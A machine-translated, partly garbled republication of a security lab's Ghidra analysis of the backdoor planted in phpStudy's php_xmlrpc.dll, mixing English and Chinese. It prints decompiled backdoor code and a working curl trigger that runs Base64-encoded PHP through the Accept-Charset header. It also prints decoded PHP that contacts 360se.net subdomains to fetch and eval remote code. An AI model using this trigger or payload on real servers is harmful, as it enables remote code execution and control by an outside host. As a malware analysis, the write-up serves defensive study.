Shulou(Shulou.com)06/01 Report--

Author: lu4nx@ knows that Chuangyu 404 active Defense Lab

The author's blog: "using Ghidra to analyze the phpStudy backdoor"

Original link: https://paper.seebug.org/1058/

It has been a few days since this incident, and all the responses have been responded. although many manufacturers and organizations have published analytical articles on the Internet, there are not many records of the analysis process. I just want to seriously use Ghidra to analyze it from beginning to end.

1 tools and platforms

Main tools:

Kali Linux

Ghidra 9.0.4

010Editor 9.0.2

Sample environment:

Windows7

PhpStudy 20180211

2 Analysis process

First install PhpStudy 20180211 in the Windows 7 virtual machine, and then copy the directory after installation to Kali Linux.

According to the information made public on the Internet: the back door exists in the php_xmlrpc.dll file, in which there is the keyword "eval", and the file MD5 is c339482fd2b233fb0a555b629c0ea5d5.

So, first find the file with the back door:

Lu4nx@lx-kali:/tmp/phpStudy$ find. /-name php_xmlrpc.dll-exec md5sum {}\ 3d2c61ed73e9bb300b52a0555135f2f7. / PHPTutorial/php/php-7.2.1-nts/ext/php_xmlrpc.dll7c24d796e0ae34e665adcc6a1643e132. / PHPTutorial/php/php-7.1.13-nts/ext/php_xmlrpc.dll3ff4ac19000e141fef07b0af5c36a5a3. / PHPTutorial/php/php-5.4.45-nts/ext/php_xmlrpc.dllc339482fd2b233fb0a555b629c0ea5d5. / PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll5db2d02c6847f4b7e8b4c93b16bc8841. / PHPTutorial/php/php-7.0.12-nts/ext/php_xmlrpc.dll42701103137121d2a2afa7349c233437 . / PHPTutorial/php/php-5.3.29-nts/ext/php_xmlrpc.dll0f7ad38e7a9857523dfbce4bce43a9e9. / PHPTutorial/php/php-5.2.17/ext/php_xmlrpc.dll149c62e8c2a1732f9f078a7d17baed00. / PHPTutorial/php/php-5.5.38/ext/php_xmlrpc.dllfc118f661b45195afa02cbf9d2e57754. / PHPTutorial/php/php-5.6.27-nts/ext/php_xmlrpc.dll

Copy the file. / PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll separately and make sure that there is a back door:

Lu4nx@lx-kali:/tmp/phpStudy$ strings. / PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll | grep evalzend_eval_string@eval (% s ('% s'));% s _ tinceval (% s (% s'))

From the search results above, you can see that there are three "eval" keywords in the file, and now load the analysis with Ghidra.

Search in Ghidra: "Search" > "For Strings" in the menu bar, press "Search" in the pop-up menu, and then filter the "eval" string in the results filter window, as shown in the figure:

From the result "Code" field above, you can see that these three keywords are all in the Data section of the file. Pick any one (I chose "@ eval (% s ('% s');") and double-click, jump to the address, and see where the string has been referenced (right-click, References > Show References to Address), as shown in the figure:

The results are as follows:

You can see that this data is used in the PUSH instruction, it should be a function call, double-click to jump to the assembly instruction, and then Ghidra will automatically convert the assembly code to higher-level pseudo code and present it in the Decompile window:

If you do not see the Decompile window, open it in the menu Window > Decompile.

In the translated function FUN_100031f0, I found the three eval characters I searched earlier, indicating that there may be multiple backdoors in this function (of course, there are three backdoors after a complete analysis).

To put in a word here, the ability of Ghidra to transform advanced code is worse than that of IDA's Hex-Rays Decompiler plug-in, such as this code for Ghidra transformation:

PuVar8 = local_19f;while (iVar5! = 0) {iVar5 = iVar5 +-1; * puVar8 = 0; puVar8 = puVar8 + 1;}

In IDA, the translation is very intuitive:

Memset (& v27,0, 0xB0u)

There is also the judgment of multiple logic, which IDA translates as:

If (a & & b) {.}

Ghidra translated it into:

If (a) {if (b) {}}

On the other hand, multi-layer if will often get lost when reading. In short, I didn't know what the code translated by Ghidra was for until I read it over and over again, and it took me hours to understand this kind of code.

2.1 backdoor for the first remote code execution

The first backdoor exists in this code:

IVar5 = zend_hash_find (* (int *) (* param_3 +-4 + * (int *) executor_globals_id_exref * 4) + 0xd8, sworn servers 1000ec9c, iVar5! =-1) {uVar6 = 0xfffffffffffffffffffffffffffffffffffffffffffft; pcVar9 = do {if (uVar6 = 0) break; uVar6 = uVar6-1; cVar1 = * pcVar9; pcVar9 = pcVar9 + 1 } while (cVar1! ='\ 0'); iVar5 = zend_hash_find (* (undefined4 *) * local_14,s_HTTP_ACCEPT_ENCODING_1000ec84,~uVar6,&local_28); if (iVar5! =-1) {pcVar9 = byte * local_28; pbVar7 = pbVar4; do {bVar2 = * pbVar7; bVar11 = bVar2

< (byte)*pcVar9; if (bVar2 != *pcVar9) { LAB_10003303: iVar5 = (1 - (uint)bVar11) - (uint)(bVar11 != false); goto LAB_10003308; } if (bVar2 == 0) break; bVar2 = pbVar7[1]; bVar11 = bVar2 < ((byte *)pcVar9)[1]; if (bVar2 != ((byte *)pcVar9)[1]) goto LAB_10003303; pbVar7 = pbVar7 + 2; pcVar9 = (char *)((byte *)pcVar9 + 2); } while (bVar2 != 0); iVar5 = 0; LAB_10003308: if (iVar5 == 0) { uVar6 = 0xffffffff; pcVar9 = s__SERVER_1000ec9c; do { if (uVar6 == 0) break; uVar6 = uVar6 - 1; cVar1 = *pcVar9; pcVar9 = pcVar9 + 1; } while (cVar1 != '\0'); iVar5 = zend_hash_find(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0xd8,s__SERVER_1000ec9c,~uVar6,&local_14); if (iVar5 != -1) { uVar6 = 0xffffffff; pcVar9 = s_HTTP_ACCEPT_CHARSET_1000ec60; do { if (uVar6 == 0) break; uVar6 = uVar6 - 1; cVar1 = *pcVar9; pcVar9 = pcVar9 + 1; } while (cVar1 != '\0'); iVar5 = zend_hash_find(*(undefined4 *)*local_14,s_HTTP_ACCEPT_CHARSET_1000ec60,~uVar6, &local_1c); if (iVar5 != -1) { uVar6 = 0xffffffff; pcVar9 = *(char **)*local_1c; do { if (uVar6 == 0) break; uVar6 = uVar6 - 1; cVar1 = *pcVar9; pcVar9 = pcVar9 + 1; } while (cVar1 != '\0'); local_10 = FUN_100040b0((int)*(char **)*local_1c,~uVar6 - 1); if (local_10 != (undefined4 *)0x0) { iVar5 = *(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4); local_24 = *(undefined4 *)(iVar5 + 0x128); *(undefined **)(iVar5 + 0x128) = local_ec; iVar5 = _setjmp3(local_ec,0); uVar3 = local_24; if (iVar5 == 0) { zend_eval_string(local_10,0,&DAT_10012884,param_3); } else { *(undefined4 *) (*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = local_24; } *(undefined4 *) (*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = uVar3; } } } } } } 阅读起来非常复杂，大概逻辑就是通过 PHP 的 zend_hash_find 函数寻找 $_SERVER 变量，然后找到 Accept-Encoding 和 Accept-Charset 两个 HTTP 请求头，如果 Accept-Encoding 的值为 gzip,deflate，就调用 zend_eval_string 去执行 Accept-Encoding 的内容： zend_eval_string(local_10,0,&DAT_10012884,param_3); 这里 zend_eval_string 执行的是 local_10 变量的内容，local_10 是通过调用一个函数赋值的： local_10 = FUN_100040b0((int)*(char **)*local_1c,~uVar6 - 1); 函数 FUN_100040b0 最后分析出来是做 Base64 解码的。 到这里，就知道该如何构造 Payload 了： Accept-Encoding: gzip,deflateAccept-Charset: Base64加密后的PHP代码 朝虚拟机构造一个请求： $ curl -H "Accept-Charset: $(echo 'system("ipconfig");' | base64)" -H 'Accept-Encoding: gzip,deflate' 192.168.128.6 结果如图： 2.2 第二处后门 沿着伪代码继续分析，看到这一段代码： if (iVar5 == 0) { puVar8 = &DAT_1000d66c; local_8 = &DAT_10012884; piVar10 = &DAT_1000d66c; do { if (*piVar10 == 0x27) { (&DAT_10012884)[iVar5] = 0x5c; (&DAT_10012885)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 2; piVar10 = piVar10 + 2; } else { (&DAT_10012884)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 1; piVar10 = piVar10 + 1; } puVar8 = puVar8 + 1; } while ((int)puVar8 < 0x1000e5c4); spprintf(&local_20,0,s_$V='%s';$M='%s';_1000ec3c,&DAT_100127b8,&DAT_10012784); spprintf(&local_8,0,s_%s;@eval(%s('%s'));_1000ec28,local_20,s_gzuncompress_1000d018, local_8); iVar5 = *(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4); local_10 = *(undefined4 **)(iVar5 + 0x128); *(undefined **)(iVar5 + 0x128) = local_6c; iVar5 = _setjmp3(local_6c,0); uVar3 = local_10; if (iVar5 == 0) { zend_eval_string(local_8,0,&DAT_10012884,param_3); } else { *(undefined4 **) (*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = local_10; } *(undefined4 *)(*(int *)(*param_3 + -4 + *(int *)executor_globals_id_exref * 4) + 0x128) = uVar3; return 0; } 重点在这段： puVar8 = &DAT_1000d66c;local_8 = &DAT_10012884;piVar10 = &DAT_1000d66c;do { if (*piVar10 == 0x27) { (&DAT_10012884)[iVar5] = 0x5c; (&DAT_10012885)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 2; piVar10 = piVar10 + 2; } else { (&DAT_10012884)[iVar5] = *(undefined *)puVar8; iVar5 = iVar5 + 1; piVar10 = piVar10 + 1; } puVar8 = puVar8 + 1; } while ((int)puVar8 < 0x1000e5c4); 变量 puVar8 是作为累计变量，这段代码像是拷贝地址 0x1000d66c 至 0x1000e5c4 之间的数据，于是选中切这行代码： puVar8 = &DAT_1000d66c; 双击 DAT_1000d66c，Ghidra 会自动跳转到该地址，然后在菜单选择 Window >

Bytes to open the hexadecimal window, now at the address 0x1000d66c, the next thing to do is to copy the data between the 0x1000d66c~0x1000e5c4:

Select menu Select > Bytes

Check "To Address" in the pop-up window, and then fill in 0x1000e5c4 in the "Ending Address" on the right, as shown in the figure:

After pressing enter, this data has been selected. I will copy them separately, right-click, and select Copy Special > Byte String (No Spaces), as shown in the figure:

Then open the 010Editor editor:

New file: File > New > New Hex File

Paste copied hexadecimal data: Edit > Paste From > Paste from Hex Text

Then, remove all the "00" bytes, select Search > Replace, look for 00MagneReplace and click "Replace All". After processing, it is as follows:

Save the processed file as p1. Learn from the file command that the file p1 is Zlib compressed data:

$file p1p1: zlib compressed data

You can extract it with Python's zlib library. The decompression code is as follows:

Import zlibwith open ("p1", "rb") as f: data = f.read () print (zlib.decompress (data))

The implementation results are as follows:

Lu4nx@lx-kali:/tmp$ python3 decom.pyb "$iFO 'info^ _ ^' .Base64 _ encode ($V.indoor. Info.com').'= = END==' $zzz='- - --' @ eval (base64_decode ('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmZ1bmN0aW9uIHRjcEdldCgkc2VuZE1zZyA9ICcnLCAkaXAgPSAnMzYwc2UubmV0JywgJHBvcnQgPSAnMjAxMjMnKXsKCSRyZXN1bHQgPSAiIjsKICAkaGFuZGxlID0gc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovL3skaXB9OnskcG9ydH0iLCAkZXJybm8sICRlcnJzdHIsMTApOyAKICBpZiggISRoYW5kbGUgKXsKICAgICRoYW5kbGUgPSBmc29ja29wZW4oJGlwLCBpbnR2YWwoJHBvcnQpLCAkZXJybm8sICRlcnJzdHIsIDUpOwoJaWYoICEkaGFuZGxlICl7CgkJcmV0dXJuICJlcnIiOwoJfQogIH0KICBmd3JpdGUoJGhhbmRsZSwgJHNlbmRNc2cuIlxuIik7Cgl3aGlsZSghZmVvZigkaGFuZGxlKSl7CgkJc3RyZWFtX3NldF90aW1lb3V0KCRoYW5kbGUsIDIpOwoJCSRyZXN1bHQgLj0gZnJlYWQoJGhhbmRsZSwgMTAyNCk7CgkJJGluZm8gPSBzdHJlYW1fZ2V0X21ldGFfZGF0YSgkaGFuZGxlKTsKCQlpZiAoJGluZm9bJ3RpbWVkX291dCddKSB7CgkJICBicmVhazsKCQl9CgkgfQogIGZjbG9zZSgkaGFuZGxlKTsgCiAgcmV0dXJuICRyZXN1bHQ7IAp9CgokZHMgPSBhcnJheSgid3d3IiwiYmJzIiwiY21zIiwiZG93biIsInVwIiwiZmlsZSIsImZ0cCIpOwokcHMgPSBhcnJheSgiMjAxMjMiLCI0MDEyNSIsIjgwODAiLCI4MCIsIjUzIik7CiRuID0gZmFsc2U7CmRvIHsKCSRuID0gZmFsc2U7Cglmb3JlYWNoICgkZHMgYXMgJGQpewoJCSRiID0gZmFsc2U7CgkJZm9yZWFjaCAoJHBzIGFzICRwKXsKCQkJJHJlc3VsdCA9IHRjcEdldCgkaSwkZC4iLjM2MHNlLm5ldCIsJHApOyAKCQkJaWYgKCRyZXN1bHQgIT0gImVyciIpewoJCQkJJGIgPXRydWU7CgkJCQlicmVhazsKCQkJfQoJCX0KCQlpZiAoJGIpYnJlYWs7Cgl9CgkkaW5mbyA9IGV4cGxvZGUoIjxePiIsJHJlc3VsdCk7CglpZiAoY291bnQoJGluZm8pPT00KXsKCQlpZiAoc3RycG9zKCRpbmZvWzNdLCIvKk9uZW1vcmUqLyIpICE9PSBmYWxzZSl7CgkJCSRpbmZvWzNdID0gc3RyX3JlcGxhY2UoIi8qT25lbW9yZSovIiwiIiwkaW5mb1szXSk7CgkJCSRuPXRydWU7CgkJfQoJCUBldmFsKGJhc2U2NF9kZWNvZGUoJGluZm9bM10pKTsKCX0KfXdoaWxlKCRuKTs='));

Decrypt this Base64 code with the base64 command, the process and result are as follows:

Lu4nx@lx-kali:/tmp$ echo 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwplcnJvcl9yZXBvcnRpbmcoMCk7CmZ1bmN0aW9uIHRjcEdldCgkc2VuZE1zZyA9ICcnLCAkaXAgPSAnMzYwc2UubmV0JywgJHBvcnQgPSAnMjAxMjMnKXsKCSRyZXN1bHQgPSAiIjsKICAkaGFuZGxlID0gc3RyZWFtX3NvY2tldF9jbGllbnQoInRjcDovL3skaXB9OnskcG9ydH0iLCAkZXJybm8sICRlcnJzdHIsMTApOyAKICBpZiggISRoYW5kbGUgKXsKICAgICRoYW5kbGUgPSBmc29ja29wZW4oJGlwLCBpbnR2YWwoJHBvcnQpLCAkZXJybm8sICRlcnJzdHIsIDUpOwoJaWYoICEkaGFuZGxlICl7CgkJcmV0dXJuICJlcnIiOwoJfQogIH0KICBmd3JpdGUoJGhhbmRsZSwgJHNlbmRNc2cuIlxuIik7Cgl3aGlsZSghZmVvZigkaGFuZGxlKSl7CgkJc3RyZWFtX3NldF90aW1lb3V0KCRoYW5kbGUsIDIpOwoJCSRyZXN1bHQgLj0gZnJlYWQoJGhhbmRsZSwgMTAyNCk7CgkJJGluZm8gPSBzdHJlYW1fZ2V0X21ldGFfZGF0YSgkaGFuZGxlKTsKCQlpZiAoJGluZm9bJ3RpbWVkX291dCddKSB7CgkJICBicmVhazsKCQl9CgkgfQogIGZjbG9zZSgkaGFuZGxlKTsgCiAgcmV0dXJuICRyZXN1bHQ7IAp9CgokZHMgPSBhcnJheSgid3d3IiwiYmJzIiwiY21zIiwiZG93biIsInVwIiwiZmlsZSIsImZ0cCIpOwokcHMgPSBhcnJheSgiMjAxMjMiLCI0MDEyNSIsIjgwODAiLCI4MCIsIjUzIik7CiRuID0gZmFsc2U7CmRvIHsKCSRuID0gZmFsc2U7Cglmb3JlYWNoICgkZHMgYXMgJGQpewoJCSRiID0gZmFsc2U7CgkJZm9yZWFjaCAoJHBzIGFzICRwKXsKCQkJJHJlc3VsdCA9IHRjcEdldCgkaSwkZC4iLjM2MHNlLm5ldCIsJHApOyAKCQkJaWYgKCRyZXN1bHQgIT0gImVyciIpewoJCQkJJGIgPXRydWU7CgkJCQlicmVhazsKCQkJfQoJCX0KCQlpZiAoJGIpYnJlYWs7Cgl9CgkkaW5mbyA9IGV4cGxvZGUoIjxePiIsJHJlc3VsdCk7CglpZiAoY291bnQoJGluZm8pPT00KXsKCQlpZiAoc3RycG9zKCRpbmZvWzNdLCIvKk9uZW1vcmUqLyIpICE9PSBmYWxzZSl7CgkJCSRpbmZvWzNdID0gc3RyX3JlcGxhY2UoIi8qT25lbW9yZSovIiwiIiwkaW5mb1szXSk7CgkJCSRuPXRydWU7CgkJfQoJCUBldmFsKGJhc2U2NF9kZWNvZGUoJGluZm9bM10pKTsKCX0KfXdoaWxlKCRuKTs=' | base64-d@ini_set ("display_errors", "0"); error_reporting (0); function tcpGet ($sendMsg ='', $ip = '360se.networked, $port =' 20123') {$result = ""; $handle = stream_socket_client ("tcp:// {$ip}: {$port}", $errno, $errstr,10); if (! $handle) {$handle = fsockopen ($ip, intval ($port), $errno, $errstr, 5) If (! $handle) {return "err";}} fwrite ($handle, $sendMsg. "\ n"); while (! feof ($handle)) {stream_set_timeout ($handle, 2); $result. = fread ($handle, 1024); $info = stream_get_meta_data ($handle) If ($info ['timed_out']) {break;}} fclose ($handle); return $result;} $ds = array ("www", "bbs", "cms", "down", "up", "file", "ftp"); $ps = array ("20123", "40125", "8080", "80", "53"); $n = false;do {$n = false Foreach ($ds as $d) {$b = false; foreach ($ps as $p) {$result = tcpGet ($iGrained.360se.net ", $p); if ($result! =" err ") {$b = true; break }} if ($b) break;} $info = explode ("", $result) If (count ($info) = = 4) {if (strpos ($info [3], "/ * Onemore*/")! = = false) {$info [3] = str_replace ("/ * Onemore*/", "", $info [3]); $Onemore*/ truth;} @ eval ($info [3])) }} while ($n); 2.3 third back door

The third backdoor is similar to the second implementation logic, and the code is as follows:

PuVar8 = & DAT_1000d028;local_c = & DAT_10012884;iVar5 = 0bot piVar10 = & DAT_1000d028;do {if (* piVar10 = = 0x27) {(& DAT_10012884) [iVar5] = 0x5c; (& DAT_10012885) [iVar5] = * (undefined *) puVar8; iVar5 = iVar5 + 2; piVar10 = piVar10 + 2;} else {(& DAT_10012884) [iVar5] = * (undefined *) puVar8; iVar5 = iVar5 + 1; piVar10 = piVar10 + 1 } puVar8 = puVar8 + 1;} while ((int) puVar8 < 0x1000d66c); spprintf (& local_c,0,s_@eval (% s (% s')); _ 1000ec14 (iVar5 + 0x128) = local_ac); iVar5 = * (int *) (* param_3 +-4 + * (int *) executor_globals_id_exref * 4); local_18 = * (undefined4 *) (iVar5 + 0x128); * (undefined *) (iVar5 + 0x128) = local_ac IVar5 = _ setjmp3 (local_ac,0); uVar3 = local_18;if (iVar5 = = 0) {zend_eval_string (local_c,0,&DAT_10012884,param_3);}

The focus is on this paragraph:

PuVar8 = & DAT_1000d028;local_c = & DAT_10012884;iVar5 = 0bot piVar10 = & DAT_1000d028;do {if (* piVar10 = = 0x27) {(& DAT_10012884) [iVar5] = 0x5c; (& DAT_10012885) [iVar5] = * (undefined *) puVar8; iVar5 = iVar5 + 2; piVar10 = piVar10 + 2;} else {(& DAT_10012884) [iVar5] = * (undefined *) puVar8; iVar5 = iVar5 + 1; piVar10 = piVar10 + 1 } puVar8 = puVar8 + 1;} while ((int) puVar8 < 0x1000d66c)

The backdoor code is in the address 0x1000d028~0x1000d66c, and the extraction and processing method is the same as that of the second backdoor. Find it and bring it up as follows:

Lu4nx@lx-kali:/tmp$ python3 decom.pyb "@ eval (base64_decode ('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwplcnJvcl9yZXBvcnRpbmcoMCk7CiRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOwokcCA9ICRfU0VSVkVSWydTRVJWRVJfUE9SVCddOwokZnAgPSBmc29ja29wZW4oJGgsICRwLCAkZXJybm8sICRlcnJzdHIsIDUpOwppZiAoISRmcCkgewp9IGVsc2UgewoJJG91dCA9ICJHRVQgeyRfU0VSVkVSWydTQ1JJUFRfTkFNRSddfSBIVFRQLzEuMVxyXG4iOwoJJG91dCAuPSAiSG9zdDogeyRofVxyXG4iOwoJJG91dCAuPSAiQWNjZXB0LUVuY29kaW5nOiBjb21wcmVzcyxnemlwXHJcbiI7Cgkkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsKIAoJZndyaXRlKCRmcCwgJG91dCk7CglmY2xvc2UoJGZwKTsKfQ=='));"

Decode this Base64 code:

Lu4nx@lx-kali:/tmp$ echo 'QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpOwplcnJvcl9yZXBvcnRpbmcoMCk7CiRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOwokcCA9ICRfU0VSVkVSWydTRVJWRVJfUE9SVCddOwokZnAgPSBmc29ja29wZW4oJGgsICRwLCAkZXJybm8sICRlcnJzdHIsIDUpOwppZiAoISRmcCkgewp9IGVsc2UgewoJJG91dCA9ICJHRVQgeyRfU0VSVkVSWydTQ1JJUFRfTkFNRSddfSBIVFRQLzEuMVxyXG4iOwoJJG91dCAuPSAiSG9zdDogeyRofVxyXG4iOwoJJG91dCAuPSAiQWNjZXB0LUVuY29kaW5nOiBjb21wcmVzcyxnemlwXHJcbiI7Cgkkb3V0IC49ICJDb25uZWN0aW9uOiBDbG9zZVxyXG5cclxuIjsKIAoJZndyaXRlKCRmcCwgJG91dCk7CglmY2xvc2UoJGZwKTsKfQ==' | base64-d@ini_set ("display_errors", "0"); error_reporting (0); $h = $_ SERVER ['HTTP_HOST']; $p = $_ SERVER [' SERVER_PORT']; $fp = fsockopen ($h, $p, $errno, $errstr, 5); if (! $fp) {} else {$out = "GET {$SERVER ['SCRIPT_NAME']} HTTP/1.1\ r\ n" $out. = "Host: {$h}\ r\ n"; $out. = "Accept-Encoding: compress,gzip\ r\ n"; $out. = "Connection: Close\ r\ n\ r\ n"; fwrite ($fp, $out); fclose ($fp);} 3 references

Https://github.com/jas502n/PHPStudy-Backdoor

"disclosure of the event that phpStudy was implanted in the backdoor | Micro-step online report"

PhpStudy backdoor Analysis, author: Hcamael@ knows that Chuangyu 404 Lab

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.